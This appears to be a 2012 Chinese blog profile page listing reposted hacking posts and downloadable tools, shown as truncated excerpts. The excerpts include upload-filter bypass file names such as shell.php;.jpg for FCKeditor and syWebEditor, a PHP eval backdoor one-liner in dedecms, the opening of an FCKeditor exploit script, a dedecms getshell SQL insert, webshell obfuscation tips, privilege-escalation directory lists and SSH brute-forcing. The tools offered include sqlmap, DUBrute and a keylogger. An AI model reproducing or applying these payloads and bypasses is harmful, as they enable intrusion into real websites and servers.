- 博客(15)
- 资源 (29)
- 收藏
- 关注
转载 提交’时提示ip被记录 防注入系统的利用。
很多朋友在入侵提权的时候都有会遇见,站点纪录了自己的IP。本文就教大家查看本机信息存在对方站点的漏洞,防止被利用例如:网址:http://www.92hack.net/newslist.asp?id=122′提示“你的操作已被记录!”等信息。利用方法:www.92hack.net/sqlin.asp 看是否存在,存在提交http://www.92hack.net
2012-04-23 10:34:29 1598
转载 FCKeditor 建立文件夹、上传文件时“.”变“_”的突破
FCKeditor 文件上传“.”变“_”下划线的绕过方法:这是网上公布的:很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shel
2012-04-22 16:48:13 1725
转载 分享一个判断dedecms版本的方法
访问/data/admin/ver.txt附加历史更新:20100708是最新版本5.620100324是5.520100429之后都是5.6版本,对应的日期为补丁的日期,可以知道什么漏洞没补5.6版本更新记录:2010-07-081.修复头像跨目录删除的bug2.UTF-8版本支付错误;2010-06-231.修复会员中心收藏夹错误
2012-04-22 16:47:39 617
转载 dedecms 5.7 一句话后门利用 exp
http://www.wooyun.org/bug.php?action=view&id=5416shopcar.class.php 被植入一句话@eval(file_get_contents('php://input'));去官网下了一套回来,看了下代码,class MemberShops{ var $OrdersId; var $productsId;
2012-04-22 16:43:31 1608
转载 在线渗透测试工具集合
家试试看吧,呵呵,不过下面那个破解wordpress密码的还能用在线端口扫描:http://scan.subhashdasyam.com/port-scanner.php在线VNC扫描:http://scan.subhashdasyam.com/dumper-with-login.php在线SSH扫描:http://scan.subhashdasya
2012-04-22 16:42:35 596
转载 fckeditor <= 2.6.4 任意文件上传漏洞
<?error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function http_send($host, $packet){ $sock = fsockopen(
2012-04-22 11:27:15 686
转载 FCKeditor-Exp通杀0day
error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function http_send($host, $packet){$sock
2012-04-22 11:16:03 748
转载 @php一句话猥琐流搞法
在渗透中常常遇到拦截eval的,所以这种形式的会被拦截常见的是变成base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=)这种形式可以绕过,另外还有其他形式 今天见一比较怪的东西:web杀毒。v1.0。点。心想是不是谁有跟云扯上了。 完了才知道是个webshell扫描工具。各位前辈把web后门弄的死
2012-04-20 22:08:45 1193
转载 webshell提权的重点目录总结
C:\Documents and Settings\All Users\「开始」菜单\程序\ --‘看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径。C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ --‘看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得
2012-04-20 22:01:24 821
转载 DEDECMS拿SHELL EXP
转自:t00ls网上流传的漏洞exp都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell _1 U- t( B- F8 c前题条件,必须准备好自己的dede数据库,然后插入数据:insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'
2012-04-20 22:00:16 857
转载 文件上传字符截断与NC提交技巧
在得到网站后台的账号密码很多网站后台上传文件之后自动重名名。这里给大家提供一种老方法了。上传文件一般是upload.asp,upfile.asp,一般可以定义文件路径,也就是uppath,而一般程序会判定后缀的,比如限定不能等于asp,aspx,asa,那么可以传cdx、cer或php(服务器支持),或者判定只能是.jpg,.gif,那么就必须使用截断方式来处理了,这儿详细说明一下
2012-04-20 21:56:35 476
转载 syWebEditor的一个通杀漏洞
直接访问 /syWebEditor/UpImg.asp?isBack=&fileType=gif|jpg|png|asa|asp|mdb|&obj=L_Img&UpPath=/a.asp; 上传a.jpg后,shell在根目录下,名为a.asp;a.jpg 试了几个,都能成功,应该是通杀的...
2012-04-20 21:55:31 524
转载 Fckeditor漏洞总结
FCk的漏洞,本文会增加自己的经验以及网络收集的漏洞,集百家之所长。1、查看编辑器版本FCKeditor/_whatsnew.html FCKeditor/editor/dialog/fck_about.html2、Version 2.2 版本Apache+linux 环境下在上传文件后面加个.突破!测试通过。3、Version http://www.hackseo.n
2012-04-20 21:53:50 1464
转载 MS12-020:远程桌面中的漏洞可能允许远程代码执行:2012 年 3 月 13 日
受影响的软件 操作系统最大安全影响综合严重等级此更新替代的公告Windows XP Service Pack 3(KB2621440)远程执行代码严重MS11-065 中的 KB2570222 由 KB2621440 替代Windows XP Professi
2012-04-03 11:33:19 2614
转载 Linux远程ssh破解
1. 软件OS::CentOS release 5.2 (Final) (可通过cat /etc/issue查看)库:libssh2-1.2.7.tar.gz http://www.libssh2.org/download/libssh2-1.2.6.tar.gzmedusa:medusa-2.0.tar.gz wget http://www.foofus.net/jmk/tool
2012-04-01 16:31:42 997
全国省市区的plist文件
2015-01-12
VMware vSphere 4.1的BT种子
2012-11-11
Python标准库中文版
2012-11-02
SqlmapNoPy.rar
2012-08-01
74cmsexp_t00ls.rar
2012-07-03
sqlmap-add8352.tar.gz
2012-07-02
K8MSSQL.rar
2012-07-02
sqlmap-0.9.zip
2012-07-02
sqlmap-add8352
2012-07-02
iis批量扫描工具
2012-05-08
Webkey_1.91.apk
2012-05-02
logkeys-0.1.1a.tar.gz
2012-05-02
DUBrute_2.1
2012-04-03
ms12-020压缩包
2012-04-03
DUBrute_v2.0_rc3.rar
2012-04-02
libssh2-1.2.7.tar.gz
2012-04-01
medusa-2.0.tar.gz
2012-04-01
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人